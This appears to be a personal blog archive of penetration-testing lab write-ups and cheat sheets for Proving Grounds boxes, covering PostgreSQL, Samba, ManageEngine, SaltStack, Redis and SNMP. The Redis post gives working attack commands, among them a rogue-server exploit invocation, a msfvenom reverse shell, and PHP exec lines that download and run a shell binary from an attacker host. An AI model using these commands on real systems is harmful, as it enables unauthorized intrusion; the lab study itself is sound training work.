Posts

Showing posts from August, 2022

PG Nibbles

Image
I look into vsftpd 3.0.3 first. Only a DDoS vulnerablity exists. Anonymous login is not working. I move onto port 80. I don't see anyting interesting. ffuf is not showing anything. It must be the postgresql server. I try psql and it does not work. It does not work because I need to set the port! The postgresql is sitting on port 5437 . The default port is 5432 . The default username/password is postgres/postgres. I don't know much about postgres so I go on hacktricks. https://book.hacktricks.xyz/network-services-pentesting/pentesting-postgresql The three metasploit modules stand out. I read the /etc/passwd file. wilson is a user. I try to read /home/wilson/.ssh/authorized_keys and /home/wilson/.ssh/id_rsa. He does not have either. Reading doesn't help. The /bin/bash on postgres is insteresting to me. I got stuck on this part for 1 hour. I use my favorite port 443 for reverse shells. Most Firewalls allow port 80 and 443. In Offsec fashion, they ...

PG Helpdesk

Image
The first thing that catches my eye is Samba and Tomcat. I go after Samba first. I exploited MS09-050 (CVE-2009-3103) a few hours ago on the PG-Internal box. I try the same metasploit exploit again. It does not work. I try to list out the shares using smbclient -L \\192.168.232.43 and smbmap -H 192.168.232.43 -r. It does not work. I abandon Samba and go after the Tomcat instance next. The app looks very retro 90s. This gives me high hopes this is the way in. I google default creds. I copy/paste administrator into the username and password box. I am in. I navigate for about 10 minutes and then see the "About" link. I can get a version out of that. The version is "ManageEngine ServiceDesk 7.6.0 build 7601". I google that and put "exploit" at the end. I read through the first github return and decide to try. ⭐ Solved In Under An Hour ⭐ Lessons Learned First time seeing ManageEngine ServiceDesk 7.6.0 Nothing else learne...

PG Internal

Image
Unrelated ⭐ Solved In Under Two Hours ⭐ A few road blocks. Nmap did not pick up Samba on the first run. RPC and "5357/tcp wsdapi" sidetracked me. Reran nmap after awhile and saw Samba. I found rpcdump.py, which could be useful on future boxes. Actions Taken MS09-050 Added to "This has worked before": https://github.com/ASzampiasSWD/OSCP/tree/master/SMB Need to Do EternalBlue example no longer works. Relearn how to use this entire library: https://github.com/worawit/MS17-010 Exploit using worawit EternalBlue on this box. Lessons Learned Nmap --script vuln-samba-* did not pick up MS09-050 for this box. I found out by googling. If you see a 2008-R2, Vista box (and EternalBlue is not working), try this instead.

PG Twiggy

Image
Script that works: https://gist.github.com/momenbasel/b883d039bb28b18ccd7efe92a91d98f8 ⭐ Solved In Under an Hour ⭐ Good Job on: Test multiple ports with script. 4505, 8000 didn't work. 4506 did. Fast at solving box. Slowed down on Enumeration. Lessons Learned Familarity and recognition with SaltStack if it shows up again.

Redis Jutsus

Image
1. redis-cli -h 192.168.232.69 sudo apt-get install redis-tools Use redis-cli to login to a redis server. 2. Redis 4.X.X/5.X.X Unauth Vulnerability. python3 redis-rogue-server.py --rhost 192.168.232.69 --rport 6379 --lhost 192.168.49.232 --lport 6379 If version starts with 4 or 5 and redis server is unauthenticated, try redis-rogue-server first. https://github.com/n0b0dyCN/redis-rogue-server 3. Write Access to a Web Directory Add a php file to the web directory using redis. msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.6.49.65 LPORT=443 -f elf php exec('wget http://10.6.49.65/shell.elf'); php exec('chmod +x shell.elf'); php exec('./shell.elf'); 4. SSH Keys You can add an SSH key if you have write access to a directory. Sometimes /home/redis can exist. More Info Here: https://book.hacktricks.xyz/network-services-pentesting/6379-pentesting-redis

PG Wombo

Image
What a troll box. I for sure thought the vulnerable way in would be NodeBB on port 8080. I redid the nmap and saw Redis and MongoDB ports were open. https://github.com/n0b0dyCN/redis-rogue-server https://book.hacktricks.xyz/network-services-pentesting/6379-pentesting-redis Lessons Learned: You can crash redis by running exploits over and over again. Revert the machine. If Redis starts with 4.X.X or 5.X.X, run RedisRogueServer. Needs to be unauthenticated too. There is another redis on tryhackme. I have the "4.X.X, 5.X.X unauth" trick. I saw in hacktricks, 4 other interesting ways to exploit redis. One was writing your SSH keys to a file and logging in. Another making a file and putting it in a web directory.

SNMP Jutsus

Image
SNMP = Simple Network Management Protocol. UDP Port 161. Can be shown on TCP. Default community is "public". Default port on snmp-check set to 161. snmp-check 192.168.232.42 If totally stuck, start copying/pasting unusual programs into Google. The ClamAV blackhole will reveal a Sendmail open port vulnerability. https://www.exploit-db.com/exploits/16924

PG: ClamAV

Image
The box name is "ClamAV". So it seems ClamAV is the next step. This is the first time I've seen SNMP be helpful for me. https://www.exploit-db.com/exploits/16924 Lessons Learned: Even if a program doesn't make sense at all, it can be piggybacking off an open port service. ClamAV -> SendMail 25 Use snmp-check 192.168.232.42. Make pages for SMTP and SNMP enumeration. Used 2/3 hints. ~3 hours with hints Need better enumeration